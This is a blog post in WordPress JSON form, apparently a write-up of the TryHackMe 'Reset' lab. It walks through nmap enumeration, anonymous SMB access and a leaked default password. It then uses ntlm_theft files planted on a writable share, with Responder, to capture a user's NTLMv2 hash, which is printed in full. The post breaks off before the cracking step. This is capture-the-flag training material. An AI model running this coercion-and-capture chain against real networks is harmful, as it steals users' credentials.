{"id":359,"date":"2024-01-28T20:44:17","date_gmt":"2024-01-29T02:44:17","guid":{"rendered":"https:\/\/blog.ishsome.com\/?p=359"},"modified":"2024-04-16T20:55:10","modified_gmt":"2024-04-17T01:55:10","slug":"tryhackme-reset","status":"publish","type":"post","link":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/","title":{"rendered":"TryHackMe: Reset"},"content":{"rendered":"\n

Reset <\/a><\/mark><\/strong>is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine.<\/p>\n\n\n\n

We will begin our enumeration with NMAP as usual.<\/p>\n\n\n\n

NMAP<\/mark><\/h4>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>nmap<\/span> <\/span>-p53,135,139,445,464,636,3268,3269,3389,5985,7680,9389,49671,49673,49703<\/span> <\/span>10.10<\/span>.105.191<\/span> <\/span>-A<\/span> <\/span>-oN<\/span> <\/span>nmap\/reset<\/span> <\/span>-Pn<\/span><\/span>\nStarting<\/span> <\/span>Nmap<\/span> <\/span>7.94<\/span>SVN<\/span> ( <\/span>https:\/\/nmap.org<\/span> ) at 2024-01-27 08:41 CST<\/span><\/span>\nNmap<\/span> <\/span>scan<\/span> <\/span>report<\/span> <\/span>for<\/span> <\/span>10.10<\/span>.105.191<\/span><\/span>\nHost<\/span> <\/span>is<\/span> <\/span>up<\/span> (0.21s <\/span>latency<\/span>).<\/span><\/span>\n<\/span>\nPORT<\/span>      <\/span>STATE<\/span> <\/span>SERVICE<\/span>       <\/span>VERSION<\/span><\/span>\n53\/tcp<\/span>    <\/span>open<\/span>  <\/span>domain<\/span>        <\/span>Simple<\/span> <\/span>DNS<\/span> <\/span>Plus<\/span><\/span>\n88\/tcp<\/span>    <\/span>open<\/span>  <\/span>kerberos-sec<\/span>  <\/span>Microsoft<\/span> <\/span>Windows<\/span> <\/span>Kerberos<\/span> (server <\/span>time:<\/span> <\/span>2024<\/span>-01-27<\/span> <\/span>20<\/span>:59:53Z<\/span>)<\/span><\/span>\n135\/tcp<\/span>   <\/span>open<\/span>  <\/span>msrpc<\/span>         <\/span>Microsoft<\/span> <\/span>Windows<\/span> <\/span>RPC<\/span><\/span>\n139\/tcp<\/span>   <\/span>open<\/span>  <\/span>netbios-ssn<\/span>   <\/span>Microsoft<\/span> <\/span>Windows<\/span> <\/span>netbios-ssn<\/span><\/span>\n445\/tcp<\/span>   <\/span>open<\/span>  <\/span>microsoft-ds?<\/span><\/span>\n464\/tcp<\/span>   <\/span>open<\/span>  <\/span>kpasswd5?<\/span><\/span>\n636\/tcp<\/span>   <\/span>open<\/span>  <\/span>tcpwrapped<\/span><\/span>\n3268\/tcp<\/span>  <\/span>open<\/span>  <\/span>ldap<\/span>          <\/span>Microsoft<\/span> <\/span>Windows<\/span> <\/span>Active<\/span> <\/span>Directory<\/span> <\/span>LDAP<\/span> (Domain: <\/span>thm.corp0.,<\/span> <\/span>Site:<\/span> <\/span>Default-First-Site-Name<\/span>)<\/span><\/span>\n3269\/tcp<\/span>  <\/span>open<\/span>  <\/span>tcpwrapped<\/span><\/span>\n3389\/tcp<\/span>  <\/span>open<\/span>  <\/span>ms-wbt-server<\/span> <\/span>Microsoft<\/span> <\/span>Terminal<\/span> <\/span>Services<\/span><\/span>\n|<\/span> <\/span>ssl-cert:<\/span> <\/span>Subject:<\/span> <\/span>commonName=HayStack.thm.corp<\/span><\/span>\n|<\/span> <\/span>Not<\/span> <\/span>valid<\/span> <\/span>before:<\/span> <\/span>2024<\/span>-01-25T21:01:31<\/span><\/span>\n|<\/span>_Not<\/span> <\/span>valid<\/span> <\/span>after:<\/span>  <\/span>2024<\/span>-07-26T21:01:31<\/span><\/span>\n|<\/span> <\/span>rdp-ntlm-info:<\/span> <\/span><\/span>\n|<\/span>   <\/span>Target_Name:<\/span> <\/span>THM<\/span><\/span>\n|<\/span>   <\/span>NetBIOS_Domain_Name:<\/span> <\/span>THM<\/span><\/span>\n|<\/span>   <\/span>NetBIOS_Computer_Name:<\/span> <\/span>HAYSTACK<\/span><\/span>\n|<\/span>   <\/span>DNS_Domain_Name:<\/span> <\/span>thm.corp<\/span><\/span>\n|<\/span>   <\/span>DNS_Computer_Name:<\/span> <\/span>HayStack.thm.corp<\/span><\/span>\n|<\/span>   <\/span>DNS_Tree_Name:<\/span> <\/span>thm.corp<\/span><\/span>\n|<\/span>   <\/span>Product_Version:<\/span> <\/span>10.0<\/span>.17763<\/span><\/span>\n|<\/span>_<\/span>  <\/span>System_Time:<\/span> <\/span>2024<\/span>-01-27T14:42:00+00:00<\/span><\/span>\n|<\/span>_ssl-date:<\/span> <\/span>2024<\/span>-01-27T14:42:40+00:00<\/span>;<\/span> <\/span>-1s<\/span> <\/span>from<\/span> <\/span>scanner<\/span> <\/span>time.<\/span><\/span>\n5985\/tcp<\/span>  <\/span>open<\/span>  <\/span>http<\/span>          <\/span>Microsoft<\/span> <\/span>HTTPAPI<\/span> <\/span>httpd<\/span> <\/span>2.0<\/span> (SSDP\/UPnP)<\/span><\/span>\n|<\/span>_http-title:<\/span> <\/span>Not<\/span> <\/span>Found<\/span><\/span>\n|<\/span>_http-server-header:<\/span> <\/span>Microsoft-HTTPAPI\/2.0<\/span><\/span>\n7680\/tcp<\/span>  <\/span>open<\/span>  <\/span>pando-pub?<\/span><\/span>\n9389\/tcp<\/span>  <\/span>open<\/span>  <\/span>mc-nmf<\/span>        <\/span>.NET<\/span> <\/span>Message<\/span> <\/span>Framing<\/span><\/span>\n49671\/tcp<\/span> <\/span>open<\/span>  <\/span>msrpc<\/span>         <\/span>Microsoft<\/span> <\/span>Windows<\/span> <\/span>RPC<\/span><\/span>\n49673\/tcp<\/span> <\/span>open<\/span>  <\/span>msrpc<\/span>         <\/span>Microsoft<\/span> <\/span>Windows<\/span> <\/span>RPC<\/span><\/span>\n49703\/tcp<\/span> <\/span>open<\/span>  <\/span>msrpc<\/span>         <\/span>Microsoft<\/span> <\/span>Windows<\/span> <\/span>RPC<\/span><\/span>\nService<\/span> <\/span>Info:<\/span> <\/span>Host:<\/span> <\/span>HAYSTACK<\/span>;<\/span> <\/span>OS:<\/span> <\/span>Windows<\/span>;<\/span> <\/span>CPE:<\/span> <\/span>cpe:\/o:microsoft:windows<\/span><\/span>\n<\/span>\nHost<\/span> <\/span>script<\/span> <\/span>results:<\/span><\/span>\n|<\/span> <\/span>smb2-security-mode:<\/span> <\/span><\/span>\n|<\/span>   <\/span>3:1:1:<\/span> <\/span><\/span>\n|<\/span>_<\/span>    <\/span>Message<\/span> <\/span>signing<\/span> <\/span>enabled<\/span> <\/span>and<\/span> <\/span>required<\/span><\/span>\n|<\/span> <\/span>smb2-time:<\/span> <\/span><\/span>\n|<\/span>   <\/span>date:<\/span> <\/span>2024<\/span>-01-27T14:42:00<\/span><\/span>\n|<\/span>_<\/span>  <\/span>start_date:<\/span> <\/span>N\/A<\/span><\/span>\n|<\/span>_clock-skew:<\/span> <\/span>mean:<\/span> <\/span>-1s,<\/span> <\/span>deviation:<\/span> <\/span>0<\/span>s,<\/span> <\/span>median:<\/span> <\/span>-1s<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
We will begin with enumerating SMB.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>smbclient<\/span> <\/span>-L<\/span> \\\\\\\\<\/span>10.10.77.111<\/span>\\\\<\/span><\/span>\nPassword <\/span>for<\/span> [WORKGROUP\\ishsome]:<\/span><\/span>\n<\/span>\n\t<\/span>Sharename<\/span>       <\/span>Type<\/span>      <\/span>Comment<\/span><\/span>\n\t<\/span>---------<\/span>       <\/span>----<\/span>      <\/span>-------<\/span><\/span>\n\t<\/span>ADMIN$<\/span>          <\/span>Disk<\/span>      <\/span>Remote<\/span> <\/span>Admin<\/span><\/span>\n\t<\/span>C$<\/span>              <\/span>Disk<\/span>      <\/span>Default<\/span> <\/span>share<\/span><\/span>\n\t<\/span>Data<\/span>            <\/span>Disk<\/span>      <\/span><\/span>\n\t<\/span>IPC$<\/span>            <\/span>IPC<\/span>       <\/span>Remote<\/span> <\/span>IPC<\/span><\/span>\n\t<\/span>NETLOGON<\/span>        <\/span>Disk<\/span>      <\/span>Logon<\/span> <\/span>server<\/span> <\/span>share<\/span> <\/span><\/span>\n\t<\/span>SYSVOL<\/span>          <\/span>Disk<\/span>      <\/span>Logon<\/span> <\/span>server<\/span> <\/span>share<\/span> <\/span><\/span>\nReconnecting<\/span> <\/span>with<\/span> <\/span>SMB1<\/span> <\/span>for<\/span> <\/span>workgroup<\/span> <\/span>listing.<\/span><\/span>\ndo_connect:<\/span> <\/span>Connection<\/span> <\/span>to<\/span> <\/span>10.10<\/span>.77.111<\/span> <\/span>failed<\/span> (Error <\/span>NT_STATUS_RESOURCE_NAME_NOT_FOUND<\/span>)<\/span><\/span>\nUnable<\/span> <\/span>to<\/span> <\/span>connect<\/span> <\/span>with<\/span> <\/span>SMB1<\/span> <\/span>--<\/span> <\/span>no<\/span> <\/span>workgroup<\/span> <\/span>available<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
The Data share looks interesting since all other shares are common on a Windows machine. Let’s try connecting since Anonymous login is allowed.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>smbclient<\/span> \\\\\\\\<\/span>10.10.77.111<\/span>\\\\<\/span>Data<\/span><\/span>\nPassword<\/span> <\/span>for<\/span> [WORKGROUP\\ishsome]:<\/span><\/span>\nTry<\/span> <\/span>"<\/span>help<\/span>"<\/span> <\/span>to<\/span> <\/span>get<\/span> <\/span>a<\/span> <\/span>list<\/span> <\/span>of<\/span> <\/span>possible<\/span> <\/span>commands.<\/span><\/span>\nsmb:<\/span> \\> <\/span>dir<\/span><\/span>\n  <\/span>.<\/span>                                   <\/span>D<\/span>        <\/span>0<\/span>  <\/span>Wed<\/span> <\/span>Jul<\/span> <\/span>19<\/span> <\/span>03<\/span>:40:57<\/span> <\/span>2023<\/span><\/span>\n  <\/span>..<\/span>                                  <\/span>D<\/span>        <\/span>0<\/span>  <\/span>Wed<\/span> <\/span>Jul<\/span> <\/span>19<\/span> <\/span>03<\/span>:40:57<\/span> <\/span>2023<\/span><\/span>\n  <\/span>onboarding<\/span>                          <\/span>D<\/span>        <\/span>0<\/span>  <\/span>Sun<\/span> <\/span>Jan<\/span> <\/span>28<\/span> <\/span>16<\/span>:53:13<\/span> <\/span>2024<\/span><\/span>\n<\/span>\n\t\t<\/span>7863807<\/span> <\/span>blocks<\/span> <\/span>of<\/span> <\/span>size<\/span> <\/span>4096<\/span>.<\/span> <\/span>3024809<\/span> <\/span>blocks<\/span> <\/span>available<\/span><\/span>\nsmb:<\/span> \\> <\/span>cd<\/span> <\/span>onboarding<\/span>\\<\/span><\/span>\nsmb: \\o<\/span>nboarding<\/span>\\> <\/span>dir<\/span><\/span>\n  <\/span>.<\/span>                                   <\/span>D<\/span>        <\/span>0<\/span>  <\/span>Sun<\/span> <\/span>Jan<\/span> <\/span>28<\/span> <\/span>16<\/span>:53:43<\/span> <\/span>2024<\/span><\/span>\n  <\/span>..<\/span>                                  <\/span>D<\/span>        <\/span>0<\/span>  <\/span>Sun<\/span> <\/span>Jan<\/span> <\/span>28<\/span> <\/span>16<\/span>:53:43<\/span> <\/span>2024<\/span><\/span>\n  <\/span>bvpfsbqm.41v.txt<\/span>                    <\/span>A<\/span>      <\/span>521<\/span>  <\/span>Mon<\/span> <\/span>Aug<\/span> <\/span>21<\/span> <\/span>13<\/span>:21:59<\/span> <\/span>2023<\/span><\/span>\n  <\/span>n0orcaea.agj.pdf<\/span>                    <\/span>A<\/span>  <\/span>4700896<\/span>  <\/span>Mon<\/span> <\/span>Jul<\/span> <\/span>17<\/span> <\/span>03<\/span>:11:53<\/span> <\/span>2023<\/span><\/span>\n  <\/span>oaovyta4.spy.pdf<\/span>                    <\/span>A<\/span>  <\/span>3032659<\/span>  <\/span>Mon<\/span> <\/span>Jul<\/span> <\/span>17<\/span> <\/span>03<\/span>:12:09<\/span> <\/span>2023<\/span><\/span>\n<\/span>\n\t\t<\/span>7863807<\/span> <\/span>blocks<\/span> <\/span>of<\/span> <\/span>size<\/span> <\/span>4096<\/span>.<\/span> <\/span>3024777<\/span> <\/span>blocks<\/span> <\/span>available<\/span><\/span>\nsmb:<\/span> \\o<\/span>nboarding<\/span>\\> <\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
Let’s get all the files and check them out.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
smb:<\/span> \\o<\/span>nboarding<\/span>\\> <\/span>dir<\/span><\/span>\n  <\/span>.<\/span>                                   <\/span>D<\/span>        <\/span>0<\/span>  <\/span>Sun<\/span> <\/span>Jan<\/span> <\/span>28<\/span> <\/span>16<\/span>:55:13<\/span> <\/span>2024<\/span><\/span>\n  <\/span>..<\/span>                                  <\/span>D<\/span>        <\/span>0<\/span>  <\/span>Sun<\/span> <\/span>Jan<\/span> <\/span>28<\/span> <\/span>16<\/span>:55:13<\/span> <\/span>2024<\/span><\/span>\n  <\/span>i4qjzpvg.5ik.pdf<\/span>                    <\/span>A<\/span>  <\/span>4700896<\/span>  <\/span>Mon<\/span> <\/span>Jul<\/span> <\/span>17<\/span> <\/span>03<\/span>:11:53<\/span> <\/span>2023<\/span><\/span>\n  <\/span>rbckog2o.o4o.txt<\/span>                    <\/span>A<\/span>      <\/span>521<\/span>  <\/span>Mon<\/span> <\/span>Aug<\/span> <\/span>21<\/span> <\/span>13<\/span>:21:59<\/span> <\/span>2023<\/span><\/span>\n  <\/span>vgtigkky.vhc.pdf<\/span>                    <\/span>A<\/span>  <\/span>3032659<\/span>  <\/span>Mon<\/span> <\/span>Jul<\/span> <\/span>17<\/span> <\/span>03<\/span>:12:09<\/span> <\/span>2023<\/span><\/span>\n<\/span>\n\t\t<\/span>7863807<\/span> <\/span>blocks<\/span> <\/span>of<\/span> <\/span>size<\/span> <\/span>4096<\/span>.<\/span> <\/span>3024624<\/span> <\/span>blocks<\/span> <\/span>available<\/span><\/span>\n\t\t<\/span><\/span>\nsmb:<\/span> \\o<\/span>nboarding<\/span>\\> <\/span>prompt<\/span> <\/span>OFF<\/span> <\/span><\/span>\nsmb:<\/span> \\o<\/span>nboarding<\/span>\\> <\/span>recurse<\/span> <\/span>ON<\/span><\/span>\nsmb:<\/span> \\o<\/span>nboarding<\/span>\\> <\/span>mget<\/span> <\/span>*<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
\n
Every time we run the dir command, the file names are changing. There is a process running constantly that is changing the file names. If we can do an MITM attack, we might be able to grab the NTLM hash of the user.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset\/SMB<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>cat<\/span> <\/span>rbckog2o.o4o.txt<\/span> <\/span><\/span>\nSubject:<\/span> <\/span>Welcome<\/span> <\/span>to<\/span> <\/span>Reset<\/span> <\/span>-\ufffdDear<\/span> <\/span><<\/span>USE<\/span>R<\/span>><\/span>,Welcome<\/span> <\/span>aboard!<\/span> <\/span>We<\/span> <\/span>are<\/span> <\/span>thrilled<\/span> <\/span>to<\/span> <\/span>have<\/span> <\/span>you<\/span> <\/span>join<\/span> <\/span>our<\/span> <\/span>team.<\/span> <\/span>As<\/span> <\/span>discussed<\/span> <\/span>during<\/span> <\/span>the<\/span> <\/span>hiring<\/span> <\/span>process,<\/span> <\/span>we<\/span> <\/span>are<\/span> <\/span>sending<\/span> <\/span>you<\/span> <\/span>the<\/span> <\/span>necessary<\/span> <\/span>login<\/span> <\/span>information<\/span> <\/span>to<\/span> <\/span>access<\/span> <\/span>your<\/span> <\/span>company<\/span> <\/span>account.<\/span> <\/span>Please<\/span> <\/span>keep<\/span> <\/span>this<\/span> <\/span>information<\/span> <\/span>confidential<\/span> <\/span>and<\/span> <\/span>do<\/span> <\/span>not<\/span> <\/span>share<\/span> <\/span>it<\/span> <\/span>with<\/span> <\/span>anyone.The<\/span> <\/span>initial<\/span> <\/span>passowrd<\/span> <\/span>is:<\/span> <\/span>ResetMe123!We<\/span> <\/span>are<\/span> <\/span>confident<\/span> <\/span>that<\/span> <\/span>you<\/span> <\/span>will<\/span> <\/span>contribute<\/span> <\/span>significantly<\/span> <\/span>to<\/span> <\/span>our<\/span> <\/span>continued<\/span> <\/span>success.<\/span> <\/span>We<\/span> <\/span>look<\/span> <\/span>forward<\/span> <\/span>to<\/span> <\/span>working<\/span> <\/span>with<\/span> <\/span>you<\/span> <\/span>and<\/span> <\/span>wish<\/span> <\/span>you<\/span> <\/span>the<\/span> <\/span>very<\/span> <\/span>best<\/span> <\/span>in<\/span> <\/span>your<\/span> <\/span>new<\/span> <\/span>role.Best<\/span> <\/span>regards,The<\/span> <\/span>Reset<\/span> <\/span>Team<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
\n
I tried password spraying on using some default username wordlist but did not get anything useful. Also, the other two pdf files have onboarding instructions and explains some of the company policies whcih weren\u2019t useful in any way either.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
smb:<\/span> \\o<\/span>nboarding<\/span>\\> <\/span>dir<\/span><\/span>\n  <\/span>.<\/span>                                   <\/span>D<\/span>        <\/span>0<\/span>  <\/span>Sun<\/span> <\/span>Jan<\/span> <\/span>28<\/span> <\/span>17<\/span>:05:43<\/span> <\/span>2024<\/span><\/span>\n  <\/span>..<\/span>                                  <\/span>D<\/span>        <\/span>0<\/span>  <\/span>Sun<\/span> <\/span>Jan<\/span> <\/span>28<\/span> <\/span>17<\/span>:05:43<\/span> <\/span>2024<\/span><\/span>\n  <\/span>bf0mrldc.bcx.pdf<\/span>                    <\/span>A<\/span>  <\/span>4700896<\/span>  <\/span>Mon<\/span> <\/span>Jul<\/span> <\/span>17<\/span> <\/span>03<\/span>:11:53<\/span> <\/span>2023<\/span><\/span>\n  <\/span>hello.pdf<\/span>                           <\/span>A<\/span>        <\/span>0<\/span>  <\/span>Sun<\/span> <\/span>Jan<\/span> <\/span>28<\/span> <\/span>17<\/span>:05:40<\/span> <\/span>2024<\/span><\/span>\n  <\/span>hello.txt<\/span>                           <\/span>A<\/span>        <\/span>0<\/span>  <\/span>Sun<\/span> <\/span>Jan<\/span> <\/span>28<\/span> <\/span>17<\/span>:03:08<\/span> <\/span>2024<\/span><\/span>\n  <\/span>vokoooio.4xd.pdf<\/span>                    <\/span>A<\/span>  <\/span>3032659<\/span>  <\/span>Mon<\/span> <\/span>Jul<\/span> <\/span>17<\/span> <\/span>03<\/span>:12:09<\/span> <\/span>2023<\/span><\/span>\n  <\/span>vrlxz3nt.v5v.txt<\/span>                    <\/span>A<\/span>      <\/span>521<\/span>  <\/span>Mon<\/span> <\/span>Aug<\/span> <\/span>21<\/span> <\/span>13<\/span>:21:59<\/span> <\/span>2023<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
I tried uploading both .txt and .pdf files but did not get any response in the responder window.<\/p>\n\n\n\n
Foothold<\/mark><\/h3>\n\n\n\n
Let’s use this tool called ntlm_theft <\/a><\/mark><\/em><\/strong> for generating multiple types of NTLMv2 hash theft files. <\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/Tools\/ntlm_theft<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span> <\/span>python3<\/span> <\/span>ntlm_theft.py<\/span> <\/span>-g<\/span> <\/span>all<\/span> <\/span>-s<\/span> <\/span>10.13<\/span>.1.112<\/span> <\/span>-f<\/span> <\/span>test<\/span> <\/span><\/span>\nCreated:<\/span> <\/span>test\/test.scf<\/span> (BROWSE <\/span>TO<\/span> <\/span>FOLDER<\/span>)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test-<\/span>(<\/span>url<\/span>)<\/span>.url<\/span> (BROWSE <\/span>TO<\/span> <\/span>FOLDER<\/span>)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test-<\/span>(<\/span>icon<\/span>)<\/span>.url<\/span> (BROWSE <\/span>TO<\/span> <\/span>FOLDER<\/span>)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test.lnk<\/span> (BROWSE <\/span>TO<\/span> <\/span>FOLDER<\/span>)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test.rtf<\/span> (OPEN)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test-<\/span>(<\/span>stylesheet<\/span>)<\/span>.xml<\/span> (OPEN)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test-<\/span>(<\/span>fulldocx<\/span>)<\/span>.xml<\/span> (OPEN)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test.htm<\/span> (OPEN <\/span>FROM<\/span> <\/span>DESKTOP<\/span> <\/span>WITH<\/span> <\/span>CHROME,<\/span> <\/span>IE<\/span> <\/span>OR<\/span> <\/span>EDGE<\/span>)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test-<\/span>(<\/span>includepicture<\/span>)<\/span>.docx<\/span> (OPEN)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test-<\/span>(<\/span>remotetemplate<\/span>)<\/span>.docx<\/span> (OPEN)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test-<\/span>(<\/span>frameset<\/span>)<\/span>.docx<\/span> (OPEN)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test-<\/span>(<\/span>externalcell<\/span>)<\/span>.xlsx<\/span> (OPEN)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test.wax<\/span> (OPEN)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test.m3u<\/span> (OPEN <\/span>IN<\/span> <\/span>WINDOWS<\/span> <\/span>MEDIA<\/span> <\/span>PLAYER<\/span> <\/span>ONLY<\/span>)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test.asx<\/span> (OPEN)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test.jnlp<\/span> (OPEN)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test.application<\/span> (DOWNLOAD <\/span>AND<\/span> <\/span>OPEN<\/span>)<\/span><\/span>\nCreated:<\/span> <\/span>test\/test.pdf<\/span> (OPEN <\/span>AND<\/span> <\/span>ALLOW<\/span>)<\/span><\/span>\nCreated:<\/span> <\/span>test\/zoom-attack-instructions.txt<\/span> (PASTE <\/span>TO<\/span> <\/span>CHAT<\/span>)<\/span><\/span>\nCreated:<\/span> <\/span>test\/Autorun.inf<\/span> (BROWSE <\/span>TO<\/span> <\/span>FOLDER<\/span>)<\/span><\/span>\nCreated:<\/span> <\/span>test\/desktop.ini<\/span> (BROWSE <\/span>TO<\/span> <\/span>FOLDER<\/span>)<\/span><\/span>\nGeneration<\/span> <\/span>Complete.<\/span><\/span>\n<\/span>\n<\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
We will try uploading all these files now to the SMB share and hope to capture the NTLM hash of a user.<\/p>\n\n\n\n
Soon enough, we receive the hash for the user AUTOMATE<\/mark><\/strong>!<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
\u250c\u2500\u2500(ishsome\u327fkali<\/span>)-<\/span>[<\/span>~\/THM\/Windows-Boxes\/Reset<\/span>]<\/span><\/span>\n\u2514\u2500$<\/span>  <\/span>sudo<\/span> <\/span>responder<\/span> <\/span>-I<\/span> <\/span>tun0<\/span> <\/span>-v<\/span><\/span>\n                                         <\/span>__<\/span><\/span>\n  <\/span>.<\/span>----<\/span>.<\/span>-----<\/span>.<\/span>-----<\/span>.<\/span>-----<\/span>.<\/span>-----<\/span>.<\/span>-----<\/span>.<\/span>--<\/span>|<\/span>  <\/span>|<\/span>.<\/span>-----<\/span>.<\/span>----<\/span>.<\/span><\/span>\n  <\/span>|<\/span>   <\/span>_<\/span>|<\/span>  <\/span>-__<\/span>|<\/span>__<\/span> <\/span>--<\/span>|<\/span>  <\/span>_<\/span>  <\/span>|<\/span>  <\/span>_<\/span>  <\/span>|<\/span>     <\/span>|<\/span>  <\/span>_<\/span>  <\/span>||<\/span>  <\/span>-__<\/span>|<\/span>   <\/span>_<\/span>|<\/span><\/span>\n  <\/span>|<\/span>__<\/span>|<\/span> <\/span>|<\/span>_____<\/span>|<\/span>_____<\/span>|<\/span>   <\/span>__<\/span>|<\/span>_____<\/span>|<\/span>__<\/span>|<\/span>__<\/span>|<\/span>_____<\/span>||<\/span>_____<\/span>|<\/span>__<\/span>|<\/span><\/span>\n                   <\/span>|<\/span>__<\/span>|<\/span><\/span>\n<\/span>\n           <\/span>NBT-NS,<\/span> <\/span>LLMNR<\/span> <\/span>&<\/span> <\/span>MDNS<\/span> <\/span>Responder<\/span> <\/span>3.1<\/span>.4.0<\/span><\/span>\n<\/span>\n  <\/span>To<\/span> <\/span>support<\/span> <\/span>this<\/span> <\/span>project:<\/span><\/span>\n  <\/span>Github<\/span> -<\/span>><\/span> <\/span>https:\/\/github.com\/sponsors\/lgandx<\/span><\/span>\n  <\/span>Paypal<\/span>  -<\/span>><\/span> <\/span>https:\/\/paypal.me\/PythonResponder<\/span><\/span>\n<\/span>\n  <\/span>Author:<\/span> <\/span>Laurent<\/span> <\/span>Gaffie<\/span> (laurent.gaffie@gmail.com)<\/span><\/span>\n  <\/span>To<\/span> <\/span>kill<\/span> <\/span>this<\/span> <\/span>script<\/span> <\/span>hit<\/span> <\/span>CTRL-C<\/span><\/span>\n<\/span>\n<\/span>\n[<\/span>+<\/span>]<\/span> Poisoners:<\/span><\/span>\n    <\/span>LLMNR<\/span>                      [ON]<\/span><\/span>\n    <\/span>NBT-NS<\/span>                     [ON]<\/span><\/span>\n    <\/span>MDNS<\/span>                       [ON]<\/span><\/span>\n    <\/span>DNS<\/span>                        [ON]<\/span><\/span>\n    <\/span>DHCP<\/span>                       [OFF]<\/span><\/span>\n<\/span>\n[<\/span>+<\/span>]<\/span> Servers:<\/span><\/span>\n    <\/span>HTTP<\/span> <\/span>server<\/span>                [ON]<\/span><\/span>\n    <\/span>HTTPS<\/span> <\/span>server<\/span>               [ON]<\/span><\/span>\n    <\/span>WPAD<\/span> <\/span>proxy<\/span>                 [OFF]<\/span><\/span>\n    <\/span>Auth<\/span> <\/span>proxy<\/span>                 [OFF]<\/span><\/span>\n    <\/span>SMB<\/span> <\/span>server<\/span>                 [ON]<\/span><\/span>\n    <\/span>Kerberos<\/span> <\/span>server<\/span>            [ON]<\/span><\/span>\n    <\/span>SQL<\/span> <\/span>server<\/span>                 [ON]<\/span><\/span>\n    <\/span>FTP<\/span> <\/span>server<\/span>                 [ON]<\/span><\/span>\n<\/span>\n..<\/span><SNIPPED><\/span>..<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
[+] Listening <\/span>for<\/span> events...<\/span><\/span>\n<\/span>\n[SMB] NTLMv2-SSP Client   <\/span>:<\/span> 10.10.52.38<\/span><\/span>\n[SMB] NTLMv2-SSP Username <\/span>:<\/span> THM<\/span>\\A<\/span>UTOMATE<\/span><\/span>\n[SMB] NTLMv2-SSP Hash     <\/span>:<\/span> AUTOMATE::THM:ac22ace6c33d1e30:18D3C04491D0F4AF68DEAA8DE5358079:01010000000000008086039E0B52DA01661F7329F18059CE0000000002000800310057003700330001001E00570049004E002D0046004B004D005600500047004300450031004E00460004003400570049004E002D0046004B004D005600500047004300450031004E0046002E0031005700370033002E004C004F00430041004C000300140031005700370033002E004C004F00430041004C000500140031005700370033002E004C004F00430041004C00070008008086039E0B52DA0106000400020000000800300030000000000000000100000000200000371A1642F741A2F7AEBAF60815161AA471F2A2F89F4A59DF8917C4E7A7F95BCF0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310033002E0031002E003100310032000000000000000000<\/span><\/span>\n<\/span><\/code><\/pre><\/div>\n\n\n\n
<\/div>\n\n\n\n
We can use hashcat <\/mark><\/em><\/strong>to crack this hash now by running the below command.<\/p>\n\n\n\n
<\/div>\n\n\n\n
<\/circle><\/circle><\/circle><\/g><\/svg><\/span><\/path><\/path><\/svg><\/span>
